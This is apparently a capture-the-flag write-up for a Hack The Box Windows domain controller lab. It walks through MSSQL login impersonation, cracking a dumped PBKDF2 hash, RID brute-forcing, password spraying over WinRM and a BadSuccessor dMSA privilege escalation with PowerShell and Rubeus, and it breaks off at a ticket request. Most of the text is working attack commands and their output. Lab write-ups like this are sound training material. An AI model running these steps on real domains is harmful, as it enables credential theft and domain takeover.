This was a real tough one, and I eventually got the System Flag in a very roundabout way. I really suspect there had to be easier ways to get that flag, but I could not figure out how to get around the walls I encountered left and right.
Anyway, let’s get to it.
Starting this machine, we already have basic credentials:
As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!
— Machine Information
Let’s first enum:
mairon s $ nmap -Pn -n -v -sCV eighteen.htb --top-port 10000 -oN eighteen.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 11:22 +0100
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating Connect Scan at 11:22
Scanning eighteen.htb (10.129.7.133) [8380 ports]
Discovered open port 80/tcp on 10.129.7.133
Discovered open port 1433/tcp on 10.129.7.133
Discovered open port 5985/tcp on 10.129.7.133
Completed Connect Scan at 11:22, 23.52s elapsed (8380 total ports)
Initiating Service scan at 11:22
Scanning 3 services on eighteen.htb (10.129.7.133)
Completed Service scan at 11:22, 6.09s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.7.133.
Initiating NSE at 11:22
Completed NSE at 11:22, 5.10s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 1.26s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Nmap scan report for eighteen.htb (10.129.7.133)
Host is up (0.017s latency).
Not shown: 8377 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Welcome - eighteen.htb
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-27T16:59:31
| Not valid after: 2056-01-27T16:59:31
| MD5: 976b 4bf7 3d8a 54e3 58ff 2e56 91cb db98
| SHA-1: b4b0 a023 cfb7 4898 fac7 44f4 364e bfe7 526e cb24
|_SHA-256: 542a ab7f 8e24 63cb 259c 3395 738e 3d19 4425 ea0f 4e63 b263 3651 9fd5 f51c 099e
| ms-sql-info:
| 10.129.7.133:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2026-01-27T17:22:36+00:00; +7h00m00s from scanner time.
| ms-sql-ntlm-info:
| 10.129.7.133:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
NSE: Script Post-scanning.
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Initiating NSE at 11:22
Completed NSE at 11:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.13 seconds
Let’s check that web page for a redirect:
mairon 17s $ curl -i 10.129.7.133
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://eighteen.htb/
Server: Microsoft-IIS/10.0
Date: Tue, 27 Jan 2026 16:58:54 GMT
Content-Length: 143
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://eighteen.htb/">here</a></body>
Thought as much.
Let’s add it to our /etc/hosts:
mairon $ echo 10.129.7.133 eighteen.htb | sudo tee -a /etc/hosts
10.129.7.133 eighteen.htb
Logging in to the web page did not work with the supplied credentials. Logging in via WinRM also didn’t, sadly. MSSQL worked:
mairon $ mssqlclient.py kevin:'iNa2we6haRj2gaw!'@eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (kevin guest@master)>
I could not enable xp_cmdshell, but I could enum the following:
SQL (kevin guest@master)> enum_users
UserName RoleName LoginName DefDBName DefSchemaName UserID SID
------------------ -------- --------- --------- ------------- ---------- -----
dbo db_owner sa master dbo b'1 ' b'01'
guest public NULL NULL guest b'2 ' b'00'
INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL
sys public NULL NULL NULL b'4 ' NULL
SQL (kevin guest@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
I could not use the financial_planner db as kevin, but I did kevin has impersonate rights on appdev:
SQL (kevin guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
b'LOGIN' b'' IMPERSONATE GRANT kevin appdev
SQL (kevin guest@master)> EXECUTE AS LOGIN = 'appdev';
SQL (appdev appdev@master)>
SQL (appdev appdev@master)> USE financial_planner;
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)>
Further enum:
SQL (appdev appdev@financial_planner)> select name from financial_planner.sys.tables;
name
-----------
users
incomes
expenses
allocations
analytics
visits
SQL (appdev appdev@financial_planner)> select * from financial_planner.dbo.users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
Cracking this hash took a long time, mainly because apparently it’s in a different format Hashcat expects. I found type 10900 to be the closest match:
mairon $ hashcat --hash-info -m 10900
hashcat (v7.1.2) starting in hash-info mode
Hash Info:
==========
Hash mode #10900
Name................: PBKDF2-HMAC-SHA256
Category............: Generic KDF
Slow.Hash...........: Yes
Deprecated..........: No
Deprecated.Notice...: N/A
Password.Type.......: plain
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure
Example.Hash.Format.: plain
Example.Hash........: sha256:1000:NjI3MDM3:vVfavLQL9ZWjg8BUMq6/FB8FtpkIGWYk
Example.Pass........: hashcat
Benchmark.Mask......: ?a?a?a?a?a?a?a
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Keep.Guessing.......: No
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
Not only do we need to omit the pbkdf2: part of our hash, but also replace the $ seperator with a : between the salt and the hash.
So, I tried cracking like so:
mairon $ hashcat -m 10900 'sha256:600000:AMtzteQIG7yAbZIa:0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133' /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-disable
Not only is this a tough hash (and therefore needed my GPU as opposed to just my CPU), it turns out the hash is still not in the right format.
And upon closer inspection, the actual hash part of Hashcat’s example hash (vVfavLQL9ZWjg8BUMq6/FB8FtpkIGWYk), is base64, not hex as our obtained hash.
The salt part already looks like base64 (or at least not hex), so I tried to convert and cracking it like so:
mairon $ printf '0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133' | base64 -w 99
MDY3M2FkOTBhMGI0YWZiMTlkNjYyMzM2ZjBmY2UzYTllZGQwYjdiMTkxOTM3MTdiZTI4Y2U0ZDY2Yzg4NzEzMw==
mairon $ $ hashcat -m 10900 'sha256:600000:AMtzteQIG7yAbZIa:MDY3M2FkOTBhMGI0YWZiMTlkNjYyMzM2ZjBmY2UzYTllZGQwYjdiMTkxOTM3MTdiZTI4Y2U0ZDY2Yzg4NzEzMw==' /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-disable
Hashcat no longer complained about the format, but I could still not crack it. Again, it turned out the hash was not yet in the right format… I eventually found an open Hashcat issue on GitHub which mentioned a script to convert a hash very similar to ours, to a correct Hashcat format. I copied and replaced my hash inside like so:
#!/usr/bin/env python3
import base64, codecs, re
exemple=b'pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133'
m = re.match(br'pbkdf2:sha256:(\d*)\$([^\$]*)\$(.*)',exemple)
iterations = m.group(1)
salt = m.group(2)
hashe = m.group(3)
print(f"sha256:{iterations.decode()}:{base64.b64encode(salt).decode()}:{base64.b64encode(codecs.decode(hashe,'hex')).decode()}")The script converted the hash like so:
mairon $ python convert.py
sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=
This converted hash actually cracked 🎉:
mairon $ hashcat -O -m 10900 'sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=' /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-disable
hashcat (v7.1.2) starting
Kernel /usr/share/hashcat/OpenCL/m10900-optimized.cl:
Optimized kernel requested, but not available or not required
Falling back to pure kernel
CUDA API (CUDA 13.1)
====================
* Device #01: NVIDIA GeForce RTX 4070 SUPER, 11172/11874 MB, 56MCU
OpenCL API (OpenCL 3.0 CUDA 13.1.112) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #02: NVIDIA GeForce RTX 4070 SUPER, skipped
Kernel /usr/share/hashcat/OpenCL/m10900-optimized.cl:
Optimized kernel requested, but not available or not required
Falling back to pure kernel
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 2394 MB (28920 MB free)
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
* Passwords.: 14344383
* Bytes.....: 53291283
* Keyspace..: 14344383
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7Gd...yIcTM=
Time.Started.....: Tue Jan 27 14:48:09 2026 (14 secs)
Time.Estimated...: Tue Jan 27 14:48:23 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 6033 H/s (11.72ms) @ Accel:6 Loops:500 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 86016/14344383 (0.60%)
Rejected.........: 0/86016 (0.00%)
Restore.Point....: 0/14344383 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:599500-599999
Candidate.Engine.: Device Generator
Candidates.#01...: 12345 -> bunny10
Hardware.Mon.#01.: Temp: 67c Fan: 51% Util: 99% Core:2775MHz Mem:10251MHz Bus:16
Started: Tue Jan 27 14:48:08 2026
Stopped: Tue Jan 27 14:48:24 2026
We now have a credential: admin:iloveyou1.
This works on the web page, but I sadly did not find a way in from there. I still suspect there must’ve been a way to upload a webshell there somewhere, but I eventually gave up, and went back to MSSQL.
NetExec has a new way to bruteforce RIDs with valid credentials for MSSQL:
mairon $ nxc mssql eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth
MSSQL 10.129.7.133 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
MSSQL 10.129.7.133 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.129.7.133 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.129.7.133 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.129.7.133 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.129.7.133 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.129.7.133 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.129.7.133 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.129.7.133 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.129.7.133 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.129.7.133 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.129.7.133 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.129.7.133 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.129.7.133 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.129.7.133 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.129.7.133 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.129.7.133 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.129.7.133 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.129.7.133 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.129.7.133 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.129.7.133 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.129.7.133 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.129.7.133 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.129.7.133 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.129.7.133 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.129.7.133 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.129.7.133 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.129.7.133 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.129.7.133 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.129.7.133 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.129.7.133 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.129.7.133 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.129.7.133 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.129.7.133 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.129.7.133 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.129.7.133 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.129.7.133 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.129.7.133 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.129.7.133 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.129.7.133 1433 DC01 1612: EIGHTEEN\dave.green
Now we have a user list which we can password spray:
mairon $ echo -e "jamie.dunn\njane.smith\nalice.jones\nadam.scott\nbob.brown\ncarol.white\ndave.green" > users.txt
mairon $ echo "iNa2we6haRj2gaw!" > password.txt
mairon $ nxc winrm eighteen.htb -u users.txt -p password.txt --no-bruteforce
WINRM 10.129.7.133 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.7.133 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.129.7.133 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.129.7.133 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.129.7.133 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
Sweet, now let’s login as adam.scott:iloveyou1, and get our User Flag 🎉:
mairon $ ewp -i eighteen.htb -u adam.scott@eighteen.htb -p 'iloveyou1'
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.5.0
[*] Connecting to 'eighteen.htb:5985' as 'adam.scott@eighteen.htb'
evil-winrm-py PS C:\Users\adam.scott\Documents> type ..\Desktop\user.txt
94591b0e72b8c1eb22d228fa54541422
We can stuff like WinPEAS from here, but since this is a domain, let’s try bloodyAD:
evil-winrm-py PS C:\Users\adam.scott\Documents> upload ../bloodyAD.exe .
Uploading /home/mairon/htb/bloodyAD.exe: 12.8MB [00:14, 943kB/s]
[+] File uploaded successfully as: C:\Users\adam.scott\Documents\bloodyAD.exe
evil-winrm-py PS C:\Users\adam.scott\Documents> .\bloodyAD.exe --host localhost -u adam.scott -p iloveyou1 get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=eighteen,DC=htb
permission: WRITE
distinguishedName: OU=Staff,DC=eighteen,DC=htb
permission: CREATE_CHILD
distinguishedName: CN=adam.scott,OU=Staff,DC=eighteen,DC=htb
permission: WRITE
distinguishedName: DC=_msdcs.eighteen.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=eighteen,DC=htb
permission: CREATE_CHILD
unicrypto\backends\cryptography\RC4.py:13: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
We got CREATE_CHILD on the Staff OU. Recall NetExec reported this is a Windows Server 2025 Build 26100 x64 machine. We might just be able to exploit BadSuccessor.
From here I followed BriPwn’s video on BadSuccessor to exploit this. I did not manage to get this to work via SharpSuccessor (as also covered in the video) and so I did it the manual way.
First, create a new computer account (this is allowed by default, and is also the case in this domain):
evil-winrm-py PS C:\Users\adam.scott\Documents> New-ADComputer -name PwnedMachine -SamAccountName 'PwnedMachine$' -AccountPassword (ConvertTo-SecureString -String "Duif123!" -AsPlainText -Force) -Enabled $true -Path "OU=Staff,DC=eighteen,DC=htb" -PassThru -Server "DC01"
DistinguishedName : CN=PwnedMachine,OU=Staff,DC=eighteen,DC=htb
DNSHostName :
Enabled : True
Name : PwnedMachine
ObjectClass : computer
ObjectGUID : 40905233-f614-4203-ab1e-885bc6cd83f2
SamAccountName : PwnedMachine$
SID : S-1-5-21-1152179935-589108180-1989892463-12601
UserPrincipalName :
Use Rubeus to get the AES256 key of the computer account, and write it down:
evil-winrm-py PS C:\Users\adam.scott\Documents> .\Rubeus.exe hash /password:Duif123! /user:PwnedMachine$ /domain:eighteen.htb
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Calculate Password Hash(es)
[*] Input password : Duif123!
[*] Input username : PwnedMachine$
[*] Input domain : eighteen.htb
[*] Salt : EIGHTEEN.HTBhostpwnedmachine.eighteen.htb
[*] rc4_hmac : 6753C6DEE157E956BDD4513C84B02196
[*] aes128_cts_hmac_sha1 : 5CE4791856782878D1523ACE15C44F3B
[*] aes256_cts_hmac_sha1 : BD583C1DCEA9967744A784C829B5825E961F4AD60F4A3AB8FB488727A0752CF1
[*] des_cbc_md5 : 4ABC43B9700E9E31
Now we will add our dMSA and configure it so that it its passwd can be read via the computer account we added. We will also allow the dMSA to delegate to the DC’s Administrator account (crazy regular users can do this):
evil-winrm-py PS C:\Users\adam.scott\Documents> New-ADServiceAccount -Name "Pwned_DMSA" -DNSHostname "eighteen.htb" -CreateDelegatedServiceAccount -PrincipalsAllowedToRetrieveManagedPassword "PwnedMachine$" -Path "OU=Staff,DC=eighteen,DC=htb"
evil-winrm-py PS C:\Users\adam.scott\Documents> $sid = (Get-ADUser -Identity "adam.scott").SID
evil-winrm-py PS C:\Users\adam.scott\Documents> $acl = Get-Acl "AD:\CN=Pwned_DMSA,OU=Staff,DC=eighteen,DC=htb"
evil-winrm-py PS C:\Users\adam.scott\Documents> $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid, "GenericAll", "Allow"
evil-winrm-py PS C:\Users\adam.scott\Documents> $acl.AddAccessRule($rule)
evil-winrm-py PS C:\Users\adam.scott\Documents> Set-Acl -Path "AD:\CN=Pwned_DMSA,OU=Staff,DC=eighteen,DC=htb" -AclObject $acl
evil-winrm-py PS C:\Users\adam.scott\Documents> Set-ADServiceAccount -Identity Pwned_DMSA -Replace @{ 'msDS-ManagedAccountPrecededByLink' = 'CN=Administrator,CN=Users,DC=eighteen,DC=htb' }
evil-winrm-py PS C:\Users\adam.scott\Documents> Set-ADServiceAccount -Identity Pwned_DMSA -Replace @{ 'msDS-DelegatedMSAState' = 2 }
evil-winrm-py PS C:\Users\adam.scott\Documents> Get-ADServiceCccount -Identity Pwned_DMSA -Properties msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState | Select-Object Name, msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState
Name msDS-ManagedAccountPrecededByLink msDS-DelegatedMSAState
---- --------------------------------- ----------------------
Pwned_DMSA CN=Administrator,CN=Users,DC=eighteen,DC=htb 2
Using the previously retrieved computer account’s AES256 key, we can ask for a TGT:
evil-winrm-py PS C:\Users\adam.scott\Documents> .\Rubeus.exe asktgt /user:PwnedMachine$ /aes256:BD583C1DCEA9967744A784C829B5825E961F4AD60F4A3AB8FB488727A0752CF1 /domain:eighteen.htb /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Using aes256_cts_hmac_sha1 hash: BD583C1DCEA9967744A784C829B5825E961F4AD60F4A3AB8FB488727A0752CF1
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\PwnedMachine$'
[*] Using domain controller: fe80::9d77:3dfa:f581:2714%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFxDCCBcCgAwIBBaEDAgEWooIExDCCBMBhggS8MIIEuKADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEfDCCBHigAwIBEqEDAgECooIEagSCBGYSU2FA0d0S1eHGm4MrFC1rPQGpwA8OU73WTLorvUv8bi4Yn3+8s5v2Gnz0M08Sc/w92OtcrE8r52M+vRKtpGMwq7MfKWECuXPNelCdFanPCf0kORjx8EGzBJFzCD1vkyOhb3bTKQKUkEM4Lrx3fnkm+fxQkj/L2nDAVn8bYukYThM9O0FrxQOjoL+HZjzu8zhFB+MBY/qvycKyUXolPv94Er/Q8B98KhxZZuqo/KOqkmrx8qtD1uNuXvLx41lAdGFhW1+q9v1uahPBnvdDvZUZXu8UeQnINo5TUiEzr+d+NbFSAVqr/K+ChfaFbErzz0xOi/b0I9b9TRR4h0qp5o7SSGeZ8Vi5tpZVDltPJAM6v7HPFYyeiezZx7/0nb+kWn7Tn+OFcAqNh5O7OqbjsfMXTA1LEEEJ39/UVXuUjK9BkcPhfmbiQ5h/Lsb6nIuE5jDbRY0CExxiN8WJDy1qBgremgGrDfZknHsG6KW/V6nf+Y/eH7RMEUuRrbjdgTUIljAi1UhdcHk4PohtywfFII3wsCIvdckmqKudp6N2LJoQ0AZ8BqASw6N7flLz0BkusYv6VEift59vIh/pJIs/38/JJ5WHnxIWIUyQofQPI5CVDfvnwG++h55wo1Mxt1lLgg5eeyCB0d1UiTm/DXcCWmYY7bBAObXKuIkIA43hNasWfckIV3oEddEszTDxMGQXx3EsnhdgRN/EzPWtPi6H+C9XUZtFEwn37JTemXF8Th9zbSI9Cn6z0+rGiHDfY1n0CZTiLufCJvaBoumgYD5heIL7htwHZ97SC/nEF8pQjCGKgroy8FXq8dzhiCch1CfO8IdgZ5LXia/H4Ewt2W+qxE7Y05H16vB8fUAzx0S/4LLOxS0V600EWX14PgxWn46/D4g8RbdXhBL5fqaEJ6SnrOdagXPkC0JW5kKMSwtixcOE8dQPuIF3u5vvQpPLK2Dv4a6p3fLEcQE+klDqwA+QHEyDknccH7NfMiF1BtYXlmTkFC/HMmorT9hm97A1SwswXZkmSKrZ7Kect375lHIC3y1AfhkOdTSSc3LEegjNiT53O4Ysn5cida3LxvTZVGiPkYualMfAFns63q8V9ipXmSKsO443VTpn/byD7kV7gOCaC3kF3yHcmoBpjrBmzpCnKfmtxF/1cdLDl4XFqGTkCjNXR+iAjyLQYQVORX85OGkTbQsPyxKIPmbEU+4B2XIt8H8OD2CRpVltPMlI0ENrXWuSN+99rPb13YemMs1GK6s0DmaB/imHo8e3wqtsrsWjaIoXqkcqvKvgcB7pgmIa4aqtVJwo+WRFRbRtq6E7/WL19XRGznmXYv1Ph+56xBGcFXPWFA8y+M0x93W2YLDzRMOb1MHml6nbh+fOa4u6MmPYlT17zimsh5junG/XM6wbUlqwJCvd5+gYQyz20dGDsFB5oXdbEvxrTHxw2hcg1Xa8TboA1lIrCJ89LH4EiBvWpxS+ITNnQRZQySBC/zR1hHkR+y5B4p/1o4HrMIHooAMCAQCigeAEgd19gdowgdeggdQwgdEwgc6gKzApoAMCARKhIgQghros42827gVLxCoJZ9odJ++GbTreZe0PrAc1vywmY3uhDhsMRUlHSFRFRU4uSFRCohowGKADAgEBoREwDxsNUHduZWRNQWNoaW5lJKMHAwUAQOEAAKURGA8yMDI2MDEyOTE4NDQ0OVqmERgPMjAyNjAxMzAwNDQ0NDlapxEYDzIwMjYwMjA1MTg0NDQ5WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDGVpZ2h0ZWVuLmh0Yg==
ServiceName : krbtgt/eighteen.htb
ServiceRealm : EIGHTEEN.HTB
UserName : PwnedMachine$ (NT_PRINCIPAL)
UserRealm : EIGHTEEN.HTB
StartTime : 1/29/2026 10:44:49 AM
EndTime : 1/29/2026 8:44:49 PM
RenewTill : 2/5/2026 10:44:49 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : hros42827gVLxCoJZ9odJ++GbTreZe0PrAc1vywmY3s=
ASREP (key) : BD583C1DCEA9967744A784C829B5825E961F4AD60F4A3AB8FB488727A0752CF1
We will use this TGT to ask for a TGS targeting the dMSA:
evil-winrm-py PS C:\Users\adam.scott\Documents> .\Rubeus.exe asktgs /targetuser:Pwned_DMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap 